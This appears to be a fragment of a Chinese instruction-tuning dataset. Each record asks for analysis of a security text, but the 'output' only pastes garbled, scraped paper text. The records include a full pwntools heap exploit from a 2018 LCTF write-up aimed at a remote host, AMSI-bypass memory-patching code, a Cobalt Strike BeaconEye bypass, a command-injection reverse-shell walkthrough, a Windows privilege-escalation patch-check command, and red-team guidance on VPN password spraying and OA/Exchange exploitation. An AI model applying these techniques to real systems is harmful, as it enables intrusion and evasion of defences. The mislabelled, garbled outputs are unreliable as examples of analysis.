well are the tracking data protected? 16 App Name GooglePlay Downloads Couple1Tracker1App 5-10", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Cobalt Strike快乐星球 前 快乐星球 Patch CVE-2021-36798 漏洞描述 漏洞影响范围 漏洞成因分析 漏洞缓解案 修复效果验证 Patch CVE-2022-23317 漏洞描述 漏洞影响范围 漏洞复现 漏洞缓解案 修复效果验证 Bypass beacon-eye 绕过原理 绕过BeaconEye 测试效果 Modify xor key Modify team server authentication header Beauty UI Bypass 360 Setchar 出现问题 修复过程 实现效果 破解补丁 使法 2 下个版本 参考资料 感谢<<安全的与盾>>星球佬让我嫖了许多东知识思路等等没有这些嫖不可能完 成快乐星球的构建本是个脚本佬们轻喷 CS <= 4.3 漏洞存在在beacon.BeaconC2.process_beacon_callback_decrypted中对beacon端发送过来的任 务处理结果的度进判断直接按照beacon端的结果进分配内存导致teamserver端崩溃 前 快乐星球 Patch CVE-2021-36798 漏洞描述 漏洞影响范围 漏洞成因分析 3 该函数为common.DataParser.readCountedBytes 可以看到readCountedBytes函数先读取个4字节的数据并转换为int类型然后根据这个int类 型的变量申请内存buffer来读取接下来的数据这就存在个问题如果攻击者可以控制这个4字节 的数据就可以控制接下来申请的buffer的度从导致teamserver端申请过内存导致陷僵死 之所以叫做缓解案是因为并没有真正的修复是对beacon为进了判断限制如果是新 session拒绝其直接发送截屏和键盘记录的结果之所以只对这俩分进判断是因为只有这俩分 调了readCountedBytes这个函数判断的关键代码为denyFirstAttack 漏洞缓解案 4 data.isNewSession判断当前任务队列是否包含该session如果没有就直接发任务处 理数据那这就存在问题 然后就是把这段判断放到截屏和键盘记录处理分 Java 复制代码 private byte[] denyFirstAttack(String var1, DataInputStream var4, int var16) { byte[] var17; if (this.data.isNewSession(var1)) { this.getCheckinListener().output(BeaconOutput.Error(var1, \"Dropped responses from session. Didn't expect \" + var16 + \" prior to first task.\")); CommonUtils.print_error(\"Dropped responses from session \" + var1 + \" [type: \" + var16 + \"] (no interaction with this session yet)\"); return null; } var17 = CommonUtils.readAll(var4); return var17; } 1 2 3 4 5 6 7 8 9 10 5 这贴下4.3版本的验证效果 未修复前使poc测试https://github.com/M-Kings/CVE-2021-36798 修复效果验证 6 可以看到直接把teamserver打宕机了 修改完后再测试防护效teamserver没有崩溃 CS <= 4.5 beacon.http-get Patch CVE-2022-23317 漏洞描述 漏洞影响范围 漏洞复现 7 beacon.http-post stager 8 stager64 漏洞缓解案 9 对请求uri进判断不是/开头都直接返回400 Bad Request具体修复位置在 cloudstrike.WebServer._serce beacon.http-get beacon.http-post 修复效果验证 Java 复制代码 if (!(uri.startsWith(\"/\"))) { return this.processResponse(uri, method, header, param, false, null, new Response(\"400 Bad Request\", \"text/plain\", \"\")); } 1 2 3 4 10 stager stager64 Bypass beacon-eye 11 绕过原理这简单记录下cs在填充profile数", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n赛博回忆录星球出品仅供小范围技术交流请勿拿去随意攻击 赛博回忆录星球出品仅供小范围技术交流请勿拿去随意攻击 欢迎关注公众号赛博回忆录 抓包看看 闭合 username 进行赛勃 fuzz发现用反引号执行`命令`可导致返回包执行相关命令 赛博成功反弹 shell 发现网上存在补丁塞博版本以及无补丁版本以上均为补丁情况下现在分析无补丁的 无补丁的使用单引号 -V 返回以下结果执行了 grep -V 赛博回忆录星球出品仅供小范围技术交流请勿拿去随意攻击 赛博回忆录星球出品仅供小范围技术交流请勿拿去随意攻击 有补丁的使用单引号 -V 则返回以下结果 以下为执行 grep 处的 sh 源码 关键执行命令语句 赛博回忆录星球出品仅供小范围技术交流请勿拿去随意攻击 赛博回忆录星球出品仅供小范围技术交流请勿拿去随意攻击 以下为未补丁后的登录 login.js 源码 以下为补丁后的 login.js 登录 sb 源码 更新补丁后对单引号进行过滤但代码未对反引号``进行过滤从而导致命令执行的情况发 生修复治标不治本", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n從初出茅廬到破解大師 我的 14 年駭客生涯回顧 Orange Tsai Orange Tsai  Principal security researcher at and captain of HITCON CTF team, focusing on Web/App 0-day research  Speaker of top hacker conferences: Black Hat USA, DEFCON, HITB, HITCON  2019 Pwnie Awards, \"Best Server-Side Bug\" winner  2021 Pwn2Own champion 幼年期 成熟期 完全體 成長期 究極體 幼年期 (2002 ~ 2007) 1. 如何開始接觸電腦? 2. 如何開始接觸駭客?  天才駭客新聞... 帥爆了 \"最佳解答\" 還是錯的... 幼年期 (2002 ~ 2007) 1. 如何開始接觸電腦? 2. 如何開始接觸駭客?  天才駭客新聞... 帥爆了 成長期 (2007 ~ 2009)  Re: 從零開始的駭客生活 1. 開放世界的遊戲探索 2. 從獨自學習到走入團體 - NISRA 3. 廢寢忘食只為了求解答 - Hacker Challenge 成長期 (2007 ~ 2009)  Re: 從零開始的駭客生活 1. 開放世界的遊戲探索 2. 從獨自學習到走入團體 - NISRA 3. 廢寢忘食只為了求解答 - Hacker Challenge 成長期 (2007 ~ 2009)  Re: 從零開始的駭客生活 1. 開放世界的遊戲探索 2. 從獨自學習到走入團體 - NISRA 3. 廢寢忘食只為了求解答 - Hacker Challenge 把公式整頁抄下來跑去問數學老師... 駭客年會: 第一次有高中生得到名次!? !(ﾟДﾟノ) 第一次有高中生拿到冠軍!? 成熟期 (2009 ~ 2013)  如何獲得更多的認同感?  外在認同感: 刻意訓練演講能力  整理過的資料才是資訊  有辦法解釋的才是知識  自我認同感: 我好像有點強好奇自己的極限在哪裡?  挑戰還有哪裡我進不去?  出事了阿伯 PHP CONF 2013 - 矛盾大對決 能入侵任何網站的駭客 vs. 絕對不會被入侵的網站 成熟期 (2009 ~ 2013)  如何獲得更多的認同感?  外在認同感: 刻意訓練演講能力  整理過的資料才是資訊  有辦法解釋的才是知識  自我認同感:我好像有點強好奇自己的極限在哪裡?  挑戰還有哪裡我進不去  出事了阿伯 完全體 (2014 ~ 2018)  對於駭客技術的追求要往哪發洩? ...CTF!  技術愛好者的天堂  追逐成就感  承認永遠有比你天才的人... 完全體 (2014 ~ 2018)  對於駭客技術的追求要往哪發洩? ...CTF!  技術愛好者的天堂  追逐成就感  承認永遠有比你天才的人... Dead End on Web Part - 余弦 (EvilCos) 哪怕再小, 也要讓自己成為某一點的 No.1 究極體 (2017 ~ Now)  眼界放大到世界莫名產生的使命感  站上世界讓世界看到台灣!  有哪些人才是我能幫忙的?  年年都要超越去年的自己陷入為了找漏洞而找的泥沼  別人(花時間)也能找到的漏洞真的是我的目標嗎?  當工具人花時間幫廠商做 QA 不覺得很無聊嗎?  用既有招式找漏洞 vs. 創造一整個新的流派 究極體 (2017 ~ Now)  眼界放大到世界莫名產生的使命感  站上世界讓世界看到台灣!  有哪些人才是我能幫忙的?  年年都要超越去年的自己陷入為了找漏洞而找的泥沼  別人(花時間)也能找到的漏洞真的是我的目標嗎?  當工具人花時間幫廠商做 QA 不覺得很無聊嗎?  用既有招式找漏洞 vs. 創造一整個新的流派 你會不會有一天不做資安 當你的動機只是因為有趣出現更有趣的東西時馬上就被吸引走 我則是來自於不同階段目標的累加怎麼覺得我會放棄資安 Dead End on Web Part - ????? 駭客是終生職 結語  變強公式: 1. 找到動機 2. 刻意挑戰 N+1 3. 解決: 獲得樂趣與成就感 4. 失敗: 檢討問題反思下一次如何避免失誤  推薦閱讀系列文:  (知乎 ZhiHu) 懶人在思考 by @Evilcos (余弦)  (CoderBridge) 成為專家之路 by @Po-Jen  (Medium) 關於變強這檔事 by @fchern 找出 \"能解\" 與 \"不能解\" 的差異 orange_8361 orange@chroot.org Thanks! https://blog.orange.tw", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass AMSI的前世今生(4) - 非主流合集 0x00 前言 分析完了[BA1-4]我相信大家对AMSI已经有了不错的认知也能够利用混淆bypass AMSI了今天我 们讨论的是非主流的bypass amsi的合集也就是[BA5-8]分别如下 [BA5] 卸载当前进程中的amsi.dll [BA6] PowerShell.exe同目录下放入傀儡amsi.dll劫持正常amsi.dll正常amsi.dll存在于 c:\\windows\\system32\\amsi.dll [BA7] Null字符绕过 [BA8] COM Server劫持劫持杀软接入接口 这些方法曾今都能起到bypass AMSI作用但是很鸡肋其中[BA5]实际测试的时候是不行的 powershell进程要崩溃其它有的早已修复 既然有非主流那么主流手法有哪些呢这里提一下目前主流好用的手法为2种第一种我们已经在 Bypass AMSI的前世今生(3) - 脚本混淆和一行命令关闭AMSI种提到的混淆+一行命令另外一种就 是内存补丁将在下一节讲到 这一节我们先来测试一遍这4个非主流手法以及他的思路 0x01 卸载当前进程中的amsi.dll 在前面的文章中我们知道amsi其实是以dll形式存在的powershell启动的时候会加载amsi.dll然 后调用其中的AmsiScanString或AmsiScanBuffer函数来进行检测在部分老的win10系统中使用的是 AmsiScanString较新的系统使用的是AmsiScanBuffer大约分界线是1709 因此我们就有了对抗思路我们能不能unload amsi.dll呢这样amsi.dll不存在了就不能检测到了 答案是不行的这样太暴力了我们深入想我们unload amsi.dllpowershell使用 AmsiOpenSession的时候函数指针指向的位置不是真正的AmsiOpenSession代码就会崩溃我们 虽然unload了amsi.dll但是我们的powershell进程也崩了2败俱伤我们使用process hacker工具来 测试下 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 1 / 7 - Welcome to www.red-team.cn 调用AmsiOpenSession的时候直接就崩溃了因此这种暴力unload的方法是不行的既然unload不 行我们来看看劫持amsi.dll 0x02 劫持amsi.dll PowerShell.exe同目录下放入傀儡amsi.dll劫持正常amsi.dll正常amsi.dll存在于 c:\\windows\\system32\\amsi.dll这个都不用过多解释常规的dll劫持技术由于研发人员使用 LoadLibrary函数导入dll的时候没有使用绝对路径因此程序会首先在当前目录下寻找dll因此我们在 powerShell.exe同目录下放一个amsi.dll做劫持但是win7以上也可以修改注册表强制加载system32 下的dll具体的详情可以阅读官方文档https://docs.microsoft.com/en-us/windows/win32/dlls/d ynamic-link-library-search-order 劫持amsi.dll有2个问题 怎么放置傀儡amsi.dll也就是放置在哪个目录 amsi.dll要导出哪些函数不导出amsi.dll本身的函数会导致和unload一样的问题使得 powershell不能工作了 解决第一个问题 我们通过process Monitor来观察下powershell.exe对amsi.dll的加载顺序我们过滤powershell.exe进 程名来观察下 我们来看看powershell先在如下目录去寻找amsi.dll没有找到然后再去system32目录下 位置是找到了我们来解决第二个问题 C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0 .0.0__31bf3856ad364e35\\ C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\ Produced by AttackTeamFamily - Author: L.N. - Date: 2021-09-30 No. 2 / 7 - Welcome to www.red-team.cn 解决第二个问题 第二个问题也是很好解决的官方给了api文档我们抄一抄就好了但是呢第一篇我们说过了官方 文档也是不全的文档比较老了目前新的a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass AMSI的前世今生(5) - 内存补丁 0x00 前言 内存补丁是目前bypass amsi最常用的技术之一通过前几篇文章我们已经知道AMSI检测相关API的调 用顺序 我们还是以powershell为例当我们打开powershell.exepowershell.exe会加载 System.Management.Automation.dll此dll会调用amsi.dll因此我们只要分析清楚这2个dll里面的函 数调用和判断逻辑就能在合适的地方修改判断逻辑使得程序判断结果为我们指定的结果 0x01 流程分析 我们先使用ILSpy反编译System.Management.Automation.dll在AmsiUtils中是amsi相关的函数 不难看出AmsiUtils里面的大部分逻辑是调用amsi里面的函数处理的我们关注AmsiUtils.ScanContent 函数里面包含的amsi扫描的完整逻辑首先如下图所示 AmsiInitialize  初始化AMSI API. AmsiOpenSession  打开session AmsiScanBuffer  scans the user-input. AmsiCloseSession  关闭session AmsiUninitialize  删除AMSI API Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-18 No. 1 / 10 - Welcome to www.red-team.cn 是不是有点眼熟amsiInitFailed也就是一句话bypass amsi的原理所在我们只需要让这个变量为 True就可以bypass我们继续往下阅读代码 注意这几个逻辑都可以让程序直接返回AMSI_RESULT_NOT_DETECTED最后我们的关注点就是 hresult只要让它小于0我们就能bypass amsi而hresult为amsi.dll里函数的返回值因此我们到 amsi.dll里面去想办法通过上面的分析我们能够在AmsiInitializeAmsiOpenSession AmsiScanBuffer这3个函数中patch都可以达到bypass amsi的效果我们先来测试AmsiInitialize Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-18 No. 2 / 10 - Welcome to www.red-team.cn 我们在amsi!AmsiInitialize上下了断点并没有断下来原因是初始化函数在powershell启动的时候就调 用了后面将不再调用 因此amsi!AmsiInitialize不是一个好的打补丁的位置我们接着看AmsiOpenSession经过测试 AmsiOpenSessionAmsiScanBuffer是可以的我们反汇编看下这2个函数 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-18 No. 3 / 10 - Welcome to www.red-team.cn 其实都不用看这2个函数直接打补丁让返回值小于0就OK了 0x02 利用 我们还是从一段利用代码开始 $p=@\" using System; using System.Linq; using System.Runtime.InteropServices; public class Program { [DllImport(\"kernel32\")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport(\"kernel32\")] public static extern IntPtr LoadLibrary(string name); [DllImport(\"kernel32\")] public static extern IntPtr VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpfloldProtect); public static void Bypass() { String a = \"isma\"; String b = \"reffuBnacSismA\"; IntPtr lib = LoadLibrary(String.Join(\"\", a.Reverse().ToArray()) + \".dll\"); IntPtr ad", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 包管理 --- **软件包是什么** 软件包这个概念是用来解决在软件安装升级过程中的复杂性的包将软件安装升级中需要的多个数据文件合并成一个单独的文件这将便于传输和通过压缩文件来减小存储空间包中的二进制可执行文件已根据开发者所选择的编译标识预编译包本身包括了所有需要的元数据如软件的名字软件的说明版本号以及要运行这个软件所需要的依赖包等等 不同流派的 Linux 发行版都创造了它们自己的包格式其中最常用的包格式有 - .deb这种包格式由 DebianUbuntuLinux Mint 以及其它的变种使用这是最早被发明的包类型 - .rpm这种包格式最初被称作红帽包管理器LCTT 译注 取自英文的首字母使用这种包的 Linux 发行版有 Red HatFedoraSUSE 以及其它一些较小的发行版 - .tar.xz这种包格式只是一个软件压缩包而已这是 Arch Linux 所使用的格式 尽管上述的包格式自身并不能直接管理软件的依赖问题但是它们的出现将 Linux 软件包管理向前推进了一大步 **为什么要有包管理工具** 今天每个可计算设备都会使用某种软件来完成预定的任务在软件开发的上古时期为了找出软件中的虫和其它缺陷软件会被严格的测试在近十年间软件被通过互联网来频繁分发以试图通过持续不断的安装新版本的软件来解决软件的缺陷问题在很多情况下每个独立的应用软件都有其自带的更新器而其它一些软件则让用户自己去搞明白如何获取和升级软件 Linux 较早采用了维护一个中心化的软件仓库来发布软件更新这种做法用户可以在这个软件仓库里查找并安装软件 **那么在包管理器出现之前在 Linux 上是如何安装软件的呢** 曾几何时软件都是通过 FTP 或邮件列表来分发的最终这些发布方式在互联网的迅猛发展下都演化成为一个个现今常见的软件发布网站一般在一个 tar 文件中只有一个非常小的文件包含了创建二进制的说明你需要做的是先解压这个包然后仔细阅读当中的 README 文件 如果你的系统上恰好有 GCC或者其它厂商的 C 编译器的话你得首先运行 ./configure 脚本并在脚本后添加相应的参数如库函数的路径创建可执行文件的路径等等除此之外这个配置过程也会检查你操作系统上的软件依赖是否满足安装要求如果缺失了任何主要的依赖该配置脚本会退出不再继续安装直到你满足了该依赖如果该配置脚本正常执行完毕将会创建一个 Makefile 文件 当有了一个 Makefile 文件时 你就可以接下去执行 make 命令该命令由你所使用的编译器提供make 命令也有很多参数被称为 make 标识这些标识能为你的系统优化最终生成出来的二进制可执行文件在计算机世界的早期这些优化是非常重要的因为彼时的计算机硬件正在为了跟上软件迅速的发展而疲于奔命今日今时编译标识变得更加通用而不是为了优化哪些具体的硬件型号这得益于现代硬件和现代软件相比已经变得成本低廉唾手可得 最后在 make 完成之后 你需要运行 make install 或 make install 来真正将这个软件安装到你的系统上可以想象为你系统上的每一个软件都执行上述的流程将是多么无聊费时更不用说如果更新一个已经安装的软件将会多复杂多么需要精力投入 **软件仓库到底是什么** 多年以前当智能电话还没有像现在这样流行时非 Linux 世界的用户是很难理解软件仓库的概念的甚至今时今日大多数完全工作在 Windows 下的用户还是习惯于打开浏览器搜索要安装的软件或升级包下载然后安装但是智能电话传播了软件商店这样一个概念智能电话用户获取软件的方式和包管理器的工作方式已经非常相近了些许不同的是尽管大多数软件商店还在费力美化它的图形界面来吸引用户大多数 Linux 用户还是愿意使用命令行来安装软件总而言之软件仓库是一个中心化的可安装软件列表上面列举了在当前系统中预先配置好的软件仓库里所有可以安装的软件下面我们举一些例子来说在各个不同的 Linux 发行版下如何在对应的软件仓库里搜寻某个特定的软件输出有截断 --- ## apt 和 apt-get apt 的全称是 Advanced Packaging Tool 是 Linux 系统下的一款安装包管理工具. **apt 和 apt-get 命令之间的区别** 没啥区别,建议使用 apt **PPA** PPA 表示个人软件包存档 软件仓库是一组文件其中包含各种软件及其版本的信息以及校验和等其他一些详细信息每个版本的 Ubuntu 都有自己的四个官方软件仓库 - Main - Canonical 支持的自由开源软件 - Universe - 社区维护的自由开源软件 - Restricted - 设备的专有驱动程序 - Multiverse - 受版权或法律问题限制的软件 见此 http:/", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nservice === 控制系统服务的实用工具 ## 补充说明 **service命令** 是Redhat Linux兼容的发行版中用来控制系统服务的实用工具它以启动停止重新启动和关闭系统服务还可以显示所有系统服务的当前状态 ### 语法 ```shell service(选项)(参数) ``` ### 选项 ```shell -h显示帮助信息 --status-all显示所服务的状态 ``` ### 参数 * 服务名自动要控制的服务名即`/etc/init.d`目录下的脚本文件名 * 控制命令系统服务脚本支持的控制命令 ### 实例 当修改了主机名ip地址等信息时经常需要把网络重启使之生效 ```shell service network status 配置设备 lo eth0 当前的活跃设备 lo eth0 service network restart 正在关闭接口 eth0 [ 确定 ] 关闭环回接口 [ 确定 ] 设置网络参数 [ 确定 ] 弹出环回接口 [ 确定 ] 弹出界面 eth0 [ 确定 ] ``` 重启mysql ```shell service mysqld status mysqld (pid 1638) 正在运行... service mysqld restart 停止 MySQL [ 确定 ] 启动 MySQL [ 确定 ] ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2018 LCTF By Nu1L 2018 LCTF PWN easy_heap pwn4fun echos just_pwn WEB Travel T4lk 1s ch34p,sh0w m3 the sh31l 1. includewebshell 2. remoteipphar 3. wrapper phar:// =>RCE L playground2 EZ OAuth userssrf -> God of domain pentest sh0w m3 the sh31l 4ga1n 1. 2. tmpfile getshell bestphp's revenge soapssrf+crlfphpsessidflag.php session_start()sessionfile call_user_funcsoap Re easy_vm Qt b2w Lunatic Game Lunatic MSP430 misc osu! gg bank easy little trick https://lctf.pwnhub.cn/index 2018/11/17 9:00-2018/11.18 21:00 PWN easy_heap read_noff by one null from pwn import * def add(size,data): p.recvuntil('>') p.sendline('1') p.recvuntil('size') p.sendline(str(size)) p.recvuntil('content') p.send(data) def dele(index): p.recvuntil('>') p.sendline('2') p.recvuntil('index') p.sendline(str(index)) #p=process('./easy_heap')#,env={'LD_PRELOAD':'./libc64.so'}) p=remote('118.25.150.134', 6666) libc = ELF('./libc64.so') for i in range(10): add(0xf0,'aaa\\n') dele(1) for i in range(3,8): dele(i) dele(9) dele(8) dele(2) dele(0) for i in range(7): add(0xf0,'aaa\\n') add(0,'') add(0xf8,'\\n') dele(0) dele(1) dele(2) dele(3) dele(4) pwn4fun exp flag dele(6) dele(5) for i in range(7): add(16,'/bin/bash\\n') p.recvuntil('>') p.sendline('3') p.recvuntil(\"index \\n> \") p.sendline('8') addr = u64(p.recv(6).ljust(8,'\\x00')) libc_base = addr - (0x00007f97e7321ca0-0x7f97e6f36000) info(hex(libc_base)) free_hook = libc_base+libc.symbols['__free_hook'] #sys = libc_base + libc.symbols['system'] sys = libc_base +0x4f322 info(hex(sys)) info(hex(free_hook)) add(0,'') dele(5) dele(8) dele(9) add(16,p64(free_hook)+'\\n') add(16,'/bin/bash\\x00') add(16,p64(sys)+'\\n') dele(0) p.interactive() from pwn import * context.log_level = 'debug' def sigin(p, username): p.recvuntil('sign (I)n or sign (U)p?') p.sendline('I') p.recvuntil('input your name') p.send(username) def choose(p, c): p.recvuntil('4. do nothing') p.sendline(str(c)) def pwn(p): count = 0 p.recvuntil('press enter to start game') p.send('\\n') #gdb.attach(p) sigin(p,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Windows 提权 -- 快速查找 exp ### 微软官方时刻关注列表网址 ~~https://technet.microsoft.com/zh-cn/library/security/dn639106.aspx~~ 地址更新为 https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017 ![](media/dff0648ea3163cbe403c144932470520.jpg) 比如常用的几个已公布的 exp * KB2592799 * KB3000061 * KB2592799 * ... 快速查找未打补丁的 exp可以最安全的减少目标机的未知错误以免影响业务 命令行下执行检测未打补丁的命令如下 ```powershell systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i \"%i\"|| @echo %i you can fuck)&del /f /q /a micropoor.txt ``` **注**以上需要在可写目录执行需要临时生成micrpoor.txt以上补丁编号请根据环境来增删 ### 示例 一般实战中在类似 `tmp` 目录等可写目录下执行如 `C:\\tmp>` 以 `11-080` 为例 ![](media/3b63ae0a14a9720140246f049ed8ab41.jpg) ![](media/b0f61077ab0e9fd3adeed9eafc0860c6.jpg) ![](media/bd807d9aabc43114610a6acee7338a78.jpg) ### exp注 ```markdown MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8) CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows 10/8.1/7/2016/2010/2008 CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008) MS17-010 [KB4013389] [Windows Kernel Mode Drivers](windows 7/2008/2003/XP) MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016) MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1) MS16-098 [KB3178466] [Kernel Driver] (Win 8.1) MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012) MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012) MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012) MS16-016 [KB3136041] [WebDAV] (2008/Vista/7) MS15-097 [KB3089656] [remote code execution] (win8.1/2012) MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012) MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012) MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012) MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012) MS15-010 [KB3036220] [Ker", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCREATING THE DEFCON CHINA 1.0 BADGE joe Grand aka kingpin introduction / badge history  bring community together through interactivity  create game to encompass the defcon experience  simple design that could be expanded during/ after defcon  interactive, command-based menu for additional exploration goals  complete tasks, get rewarded  4 roots and 4 branches, each with 4 leds  when task is complete, badge inserted into programmer to unlock LED  when each root is complete, magic happens  when all roots are complete, more magic happens gameplay early concepts Prototyping block diagram Hardware USB POWER LED control ACCELEROMETER mcu FPC  First for conference badge  new material (for us) opens up new risks/ challenges  specific stack-up to meet edge connector requirements  MAJOR SUPPORT by electronic interconnect, adapt electronics FLEXIBLE PRINTED CIRCUIT (FPC)  edge connector as interface to the outside world  UART, I2C, AVR ICSP  used with programming shield to set/read state of badge leds FLEXIBLE PRINTED CIRCUIT (FPC) pin 1 pin 12 1. GND 2. SCK 3. MISO 4. MOSI 5. /RST 6. SDA 7. SCL 8. SIN 9. SOUT 10. / SEN SE 11. GPI O 12 VCC FLEXIBLE PRINTED CIRCUIT (FPC) IT BEND S!  test  test  test Schematic USB INTERFACE  allows for arduino programming and interactive mode  FT231X USB-to-Serial UART  entire usb protocol handled on-chip  host will recognize as virtual serial device/com port  mosfets for soft-start and power switchover led matrix  multiplexing via led matrix library  row controlled by discrete i/O  column controlled through 74hc595 shift register  refresh @ 175hz to reduce flicker  each led individually addressable, dimmable (16 levels) accelerometer  ST microelectronics LIS3DH  3-axis digital output (i2c/SPI)  +/- 2, 4, 8, 16g range  interrupt on motion or free fall  used to preserve battery life  sleep mode @ 10 seconds of inactivity  Raw values available through interactive mode bill-of- materials  ARDUINO  open source platform based on easy-to-use hw/sw/FW ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n!\"#$%&'() 360高级攻防-灵腾实验室  赖志活 Wfox 0 !\"#$%&'( 1 针对外网开放资产进行探测定位远程办公类系统并进行攻击以达到突破网络边界窃取数 据的目的  VPN系统深信服VPN思科VPN  办公云桌面Vmware HorizonCitrix深信服VDI  办公OA泛微致远蓝凌通达  邮件系统Exchangecoremail亿邮 !\"#$%&'(  )*+'( 2 1. 收集用户名密码规律 1) 用户名规律  常见用户名姓名全拼zhangsan名字缩写wangsm姓名倒序sanzhang工号01111  已有通讯录top500top1000百家姓top50w 2) 密码规律  已知初始密码弱口令键盘密码 !\"#$%&'(  )*+'( 3 2. 密码喷洒 动态代理池绕过登录限制接口密码喷洒弱口令 POST /por/login_psw.csp?type=cs&dev=mac&language=zh_CN&encrypt=0 HTTP/1.1 Host: vpn.xxx.com Content-Type: application/x-www-form-urlencoded Content-Length: 49 svpn_name=test&svpn_password=test&svpn_rand_code= !\"#$%&'(  )*+'( 4 2. 密码喷洒  爆破成功  爆破失败 !\"#$%&'(  )*+'( 5 3. 双因子认证突破  手机验证码 1) 社工骗取验证码  手机动态口令 1) 综合其他社工途径获取到的VPN使用文档得知动态令牌绑定过程 2) 尝试获取种子二维码如邮箱微信企业IMkey文件等途径  机器码绑定 1) 初次登录可直接绑定机器 !\"#$%&'(  )*+'( 6 4. 可达网段定位 除了导航页Web资源外可查看本机路由表 route print定位所有可访问的内网网段 网段10.128.0.0掩码255.128.0.0 IP范围10.128.0.0  10.255.255.255 !\"#$%&'(  )*+'( 7 5. VPN内网扫描 从小到大的原则添加单个IP资源或IP段一般为重要应用系统  针对单个IP的资源进行探测255.255.255.255  针对小C段进行探测255.255.255.128-255  针对C段进行扫描255.255.255.0  可达网段大范围扫描 !\"#$%&'(  )*+ 8 !\"#$%&'(  )*+ 9 1. 攻击入口 国内常见云桌面如Citrix深信服VDI VMware Horizon用途通常分为日常办公开发环境 测试环境准生产环境等  口令收集登录  弱口令喷洒  历史漏洞利用Citrix !\"#$%&'(  )*+ 10 2. 横向手法 云桌面内访问的资源取决于当前云桌面的用途  信息收集浏览器记录保存密码其他用户目录的文件共享盘文件  业务相关gitlabwikijiraJenkins  集权管控AD域控VMware ESXiVMware Vcenter  传统攻击弱口令通用漏洞0day漏洞 !\"#$%&'(  )*+ 11 3. 攻击案例1 !\"#$%&'(  )*+ 12 4. 攻击案例2 云桌面资源用户认证等都是基于AD域拿下域控等于控制所有办公电脑 1. 常见手段攻击域控zerologonms17010弱口令等 2. 定位运维人员账号云桌面 3. 控制权限并信息收集服务器资源表密码本 4. 通过密码本或基于当前权限xshell软件保存密码直接登录测试环境 5. 控制集权管控类设备如堡垒机VCenterESXi !\"#$%&'(  )*+ 13 5. 网络突破 1) 突破出网限制 1) 部分机器可直接出网 2) 部分机器配置IE代理可出网 2) 测试网突破生产网 1) 测试生产区分不明确区域之间可互相访问 2) 寻找高权限机器当跳板突破生产网 3) 利用VCenter的生产vSwitchvlan创建虚拟机以此作为跳板攻击生产网 !\"#$%&'(  %&)* 14 办公OA是近年攻防演练突破边界的重灾区0day漏洞频出泛微致远蓝凌通达 1. 0day漏洞1day漏洞nday漏洞撕口子 2. 密码收集弱口令登入办公OA收集各类文档 3. 收集员工通讯录姓名岗位手机号邮箱再次定点钓鱼 !\"#$%&'(  )*'( 15 1. 邮件钓鱼 1) 探测存活邮箱互联网检索SMTP协议爆破coremail接口爆破 2) 邮件伪造 3) 安全网关绕过 2. 漏洞攻击 1) Exchange ServerCVE-2020-0688proxylogonproxyshell 2) 亿邮RCE 3) Coremail RCE !\"#$%& 16", "category": "text_analysis", "source": "security_papers"}
